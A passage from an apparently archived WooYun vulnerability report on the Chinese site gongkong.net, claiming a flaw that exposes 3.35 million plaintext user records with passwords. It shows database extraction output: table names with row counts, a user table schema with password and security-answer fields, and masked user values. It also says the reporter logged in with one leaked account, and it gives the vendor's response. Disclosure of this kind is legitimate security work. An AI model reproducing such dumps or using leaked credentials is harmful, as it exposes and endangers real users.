 | dbo.ProseminaryNewsAsso                | 26      |
 | dbo.HistoryElement                     | 25      |
 | dbo.InfoProjectBrand                   | 25      |
 | dbo.InfoProjectReply                   | 25      |
 | dbo.OnlineSurvery                      | 25      |
 | dbo.BaseUserJob                        | 24      |
 | dbo.BQuickLink                         | 24      |
 | dbo.BModule                            | 23      |
 | dbo.ElementOperation                   | 23      |
 | dbo.BRole                              | 21      |
 | dbo.HrPositionIndexAction              | 21      |
 | dbo.OAService                          | 21      |
 | dbo.CardCase                           | 20      |
 | dbo.IndexLog                           | 20      |
 | dbo.news_list                          | 20      |
 | dbo.OAMessageIndexAction               | 20      |
 | dbo.ExpositionIntroType                | 19      |
 | dbo.HRReportStat                       | 19      |
 | dbo.CoHotMessage                       | 18      |
 | dbo.CompanyOnlineContact               | 18      |
 | dbo.HRSurveyCompany                    | 18      |
 | dbo.PlatQuestion                       | 18      |
 | dbo.BaseProductionRun                  | 17      |
 | dbo.TechArticleType                    | 17      |
 | dbo.BColumn                            | 16      |
 | dbo.PhotoWinPrizeResult                | 16      |
 | dbo.ProjectDocumentIndustry            | 16      |
 | dbo.BPrivilegeBProject                 | 15      |
 | dbo.IRegUserOnline                     | 15      |
 | dbo.newsType                           | 15      |
 | dbo.prosemtmp                          | 15      |
 | dbo.BProject                           | 14      |
 | dbo.AdReservation                      | 13      |
 | dbo.BaseProductTypeParameter           | 13      |
 | dbo.IConfig                            | 13      |
 | dbo.IMessage                           | 13      |
 | dbo.QuestionnaireIndexAction           | 13      |
 | dbo.BizCooperateProductSeries          | 12      |
 | dbo.Bookconcern                        | 12      |
 | dbo.BaseCompanyType                    | 11      |
 | dbo.CompanyCompanySection              | 11      |
 | dbo.CompanyHrColumn                    | 11      |
 | dbo.WuliuProductModel                  | 11      |
 | dbo.ActPermission                      | 10      |
 | dbo.BDepartment                        | 10      |
 | dbo.ClubMessageType                    | 10      |
 | dbo.DatumType                          | 10      |
 | dbo.MPRuleType                         | 10      |
 | dbo.MRReportType                       | 10      |
 | dbo.NewsSocialType                     | 10      |
 | dbo.WuliuModelParameters               | 10      |
 | dbo.DatumIndustry_Del                  | 9       |
 | dbo.ExtWebUserBind                     | 9       |
 | dbo.solutionsArtBak                    | 9       |
 | dbo.BaseRegion                         | 8       |
 | dbo.CompanyType                        | 8       |
 | dbo.Datum_Del                          | 8       |
 | dbo.HREducational                      | 8       |
 | dbo.HRWorkYear                         | 8       |
 | dbo.PaperType                          | 8       |
 | dbo.ResearchNewsType                   | 8       |
 | dbo.StockType                          | 8       |
 | dbo.BizSales_Del                       | 7       |
 | dbo.BizTrades_Del                      | 7       |
 | dbo.CommonMutuality                    | 7       |
 | dbo.MRCustomer                         | 7       |
 | dbo.smsType                            | 7       |
 | dbo.UserLoginInfo                      | 7       |
 | dbo.english_feedback                   | 6       |
 | dbo.HrUserIndexUpdate                  | 6       |
 | dbo.OAGiftType                         | 6       |
 | dbo.ProseminarIndustry                 | 6       |
 | dbo.ProseminarType                     | 6       |
 | dbo.RegUserGroupType                   | 6       |
 | dbo.Setting                            | 6       |
 | dbo.ActRoleGroup                       | 5       |
 | dbo.BizCooperateType                   | 5       |
 | dbo.Competency                         | 5       |
 | dbo.HrHunter                           | 5       |
 | dbo.OnlineDemoQuestion                 | 5       |
 | dbo.ProductCustomTypeBaseProductType   | 5       |
 | dbo.RecvMsgTable                       | 5       |
 | dbo.TutoriaType                        | 5       |
 | dbo.v_Forum_List3                      | 5       |
 | dbo.ActRolePermission                  | 4       |
 | dbo.ArticleType                        | 4       |
 | dbo.BSite                              | 4       |
 | dbo.ExpositionType                     | 4       |
 | dbo.MessageType                        | 4       |
 | dbo.OnlineProsemSubject                | 4       |
 | dbo.PayType                            | 4       |
 | dbo.TechArticle_Del                    | 4       |
 | dbo.BizTradesType                      | 3       |
 | dbo.BookIndexAction                    | 3       |
 | dbo.BookWarehouse                      | 3       |
 | dbo.CompanyDomainName                  | 3       |
 | dbo.CompanyRepair                      | 3       |
 | dbo.CoTemplatePage                     | 3       |
 | dbo.HrNewsType                         | 3       |
 | dbo.MediaNewsType                      | 3       |
 | dbo.ProductDocumentIndustry            | 3       |
 | dbo.ProductTypeBrandRel                | 3       |
 | dbo.ResearchReportType                 | 3       |
 | dbo.s_advertising                      | 3       |
 | dbo._temp_ProductModel4Custom          | 2       |
 | dbo.AdvertiseBrand                     | 2       |
 | dbo.AdvOpenSetting                     | 2       |
 | dbo.CommunityType                      | 2       |
 | dbo.CompanyUsers                       | 2       |
 | dbo.CoTemplateArea                     | 2       |
 | dbo.HrAdactivity                       | 2       |
 | dbo.MmsType                            | 2       |
 | dbo.MPWarningSet                       | 2       |
 | dbo.ProductBidding                     | 2       |
 | dbo.SolutionType                       | 2       |
 | dbo.sysfile1                           | 2       |
 | dbo.BizTradesIndexAction               | 1       |
 | dbo.BPriceKeyword                      | 1       |
 | dbo.CommonMisspellings                 | 1       |
 | dbo.CommonSubjectInd                   | 1       |
 | dbo.CompanyIndexAction                 | 1       |
 | dbo.CompanySection                     | 1       |
 | dbo.CoTemplate                         | 1       |
 | dbo.DatumIndexAction                   | 1       |
 | dbo.InfoPublicationFeedback            | 1       |
 | dbo.IpForumFrequency                   | 1       |
 | dbo.MediaPaperType                     | 1       |
 | dbo.OnlineCurrentProseminar            | 1       |
 | dbo.paperPrize                         | 1       |
 | dbo.PhotoContestPage                   | 1       |
 | dbo.ProseminarIndexAction              | 1       |
 | dbo.RegUserOnline                      | 1       |
 | dbo.tv_visiter                         | 1       |
 | dbo.UserForumFrequency                 | 1       |
 | dbo.videoVoice                         | 1       |
 | dbo.ViewForumAdmin                     | 1       |
 | dbo.ViewUnid                           | 1       |
 | dbo.WapAd                              | 1       |
 | dbo.WapCompany                         | 1       |
 +----------------------------------------+---------+
code 区域 
Database: gongkongnet
 Table: RegUserView
 [72 columns]
 +----------------------+----------+
 | Column               | Type     |
 +----------------------+----------+
 | active               | int      |
 | actUserId            | char     |
 | address              | nvarchar |
 | answer               | nvarchar |
 | biddingType          | char     |
 | classday             | nvarchar |
 | comCreatDate         | datetime |
 | Comment              | varchar  |
 | companyName          | nvarchar |
 | companyUrl           | nvarchar |
 | customSettings       | nvarchar |
 | disableBizTrade      | char     |
 | disableForum         | char     |
 | distributeRate       | decimal  |
 | email                | nvarchar |
 | emailAlertTime       | datetime |
 | fax                  | nvarchar |
 | feedbacktrashnum     | int      |
 | flag                 | char     |
 | handset              | nvarchar |
 | height               | nvarchar |
 | id                   | char     |
 | industryBound        | nvarchar |
 | industryCode         | bigint   |
 | interest             | nvarchar |
 | interestCode         | bigint   |
 | isAcceptSMS          | int      |
 | IsAdded              | int      |
 | isAddressValidation  | int      |
 | isCardIdValidation   | int      |
 | isemail              | int      |
 | isEmailAlert         | char     |
 | isExpert             | int      |
 | isFaxValidation      | int      |
 | isJoinMp             | int      |
 | ismobile             | int      |
 | isPhoneValidation    | int      |
 | isTrueNameValidation | int      |
 | isUsefulAddress      | char     |
 | isUsefulEMail        | bit      |
 | isUsefulPhone        | char     |
 | isUsefulUserInfo     | char     |
 | job                  | nvarchar |
 | jobdgree             | nvarchar |
 | joinFrom             | nvarchar |
 | joinMPTime           | datetime |
 | joinTime             | datetime |
 | lastLogin            | datetime |
 | lastTime             | datetime |
 | loginName            | nvarchar |
 | loginPoint           | int      |
 | market               | nvarchar |
 | oldcode              | int      |
 | organization         | nvarchar |
 | ownership            | nvarchar |
 | panman               | nvarchar |
 | password             | nvarchar |
 | persons              | nvarchar |
 | phone                | nvarchar |
 | postalcode           | nvarchar |
 | productTypeBound     | nvarchar |
 | province             | nvarchar |
 | question             | nvarchar |
 | sex                  | char     |
 | status               | char     |
 | trueName             | nvarchar |
 | turnover             | nvarchar |
 | updateDate           | datetime |
 | userType             | nvarchar |
 | validLevel           | int      |
 | vipRequest           | char     |
 | workday              | nvarchar |
 +----------------------+----------+
mask 区域 
*****----------+----*****
 *****         *****
 *****----+-------*****
 *****        | *****
 *****      | liu*****
 *****         *****
 *****      |  23*****
 *****        | *****
 *****    |  镇*****
 *****         *****
 *****        *****
 *****         *****
 *****        | *****
 *****         *****
 *****         *****
 *****        | *****
 *****        *****
 *****        *****
 *****         *****
 *****        | *****
 *****         *****
 *****         *****
 *****         *****
 *****9        *****
 *****         *****
 *****    | 抓住*****
 *****        | *****
 *****         *****
 *****        | *****
 *****        | *****
 *****         *****
 *****          *****
 *****          *****
 *****         *****
 *****    | 好想*****
 *****            *****
 *****          *****
 *****          *****
 *****        | hu*****
 *****          *****
 *****          *****
 *****        | *****
 *****         *****
 *****         *****
 *****         *****
 *****         *****
 *****        | *****
 *****         *****
 *****        | *****
 *****         *****
 *****         *****
 *****          |*****
 *****          *****
 *****        | *****
 *****          *****
 *****4567890-= |*****
 *****        | *****
 *****      | con*****
 *****        | *****
 *****          *****
 *****        | *****
 *****        | *****
 *****        | *****
 *****      | 全*****
 *****         *****
 *****        | *****
 *****         *****
 *****        | *****
 *****        | *****
 *****        | *****
 *****         *****
 *****         *****
 *****        | *****
 *****        | *****
 *****6297     *****
 *****        | *****
 *****         *****
 *****         *****
 *****5        *****
 *****        | *****
 *****        | *****
 *****         *****
 *****    | 正在*****
 *****         *****
 *****         *****
 *****         *****
 *****        | *****
 *****        *****
 *****         *****
 *****         *****
 *****        | *****
 *****         *****
 *****        | *****
 *****        | *****
 *****         *****
 *****        | *****
 *****        | *****
 *****         *****
 *****         *****
 *****        | *****
 *****         *****
 *****        | *****
 *****         *****
 *****      | zhe*****
 *****        | *****
 *****         *****
 *****        | zi*****
 *****         *****
 *****        | *****
 *****        | *****
 *****        | *****
 *****        | *****
 *****         *****
 *****        | *****
 *****         *****
 *****        | *****
 *****    | 小子*****
 *****         *****
 *****        | *****
 *****         *****
 *****         *****
 *****        | *****
 *****         *****
 *****        | *****
 *****        | *****
 *****        | *****
 *****        | *****
 *****         *****
 *****         *****
 *****        | *****
 *****         *****
 *****9        *****
 *****         *****
 *****        | *****
 *****         *****
 *****        | *****
 *****        | *****
 *****        | *****
 *****         *****
 *****         *****
 *****        | *****
 *****        | *****
 *****         *****
 *****        | *****
 *****         *****
 *****!        *****
 *****         *****
 *****    | 忙碌*****
 *****        | *****
 *****         *****
 *****        | *****
 *****         *****
 *****         *****
 *****         *****
 *****      | 汉*****
 *****         *****
 *****         *****
 *****         *****
 *****         *****
 *****         *****
 *****05       *****
 *****         *****
 *****         *****
 *****        | *****
 *****         *****
 *****         *****
 *****         *****
 *****        | *****
 *****      | 杨*****
 *****        | *****
 *****    | 沙漠*****
 *****         *****
 *****         *****
 *****ot;        *****
 *****            *****
 *****         *****
 *****        | *****
 *****         *****
 *****      | 琐*****
 *****         *****
 *****        | *****
 *****        | *****
 *****         *****
 *****      | 琐*****
 *****    | KUVI58*****

中国工控网全网某漏洞可影响三百三十五万明文用户数据含密码

中国工控网全网某漏洞可影响三百三十五万明文用户数据含密码

随便试了个用户名密码,登录成功

中国工控网全网某漏洞可影响三百三十五万明文用户数据含密码

漏洞证明:

中国工控网全网某漏洞可影响三百三十五万明文用户数据含密码

中国工控网全网某漏洞可影响三百三十五万明文用户数据含密码

中国工控网全网某漏洞可影响三百三十五万明文用户数据含密码

修复方案:

过滤参数,上waf 或者软件防火墙

版权声明:转载请注明来源 小菜果子@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-03-18 18:22

厂商回复:

CNVD未直接复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-03-22 10:03 | 酱油哥 ( 实习白帽子 | Rank:53 漏洞数:3 | 打酱油。)

    1

    2010的时候,就已经脱裤了~

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin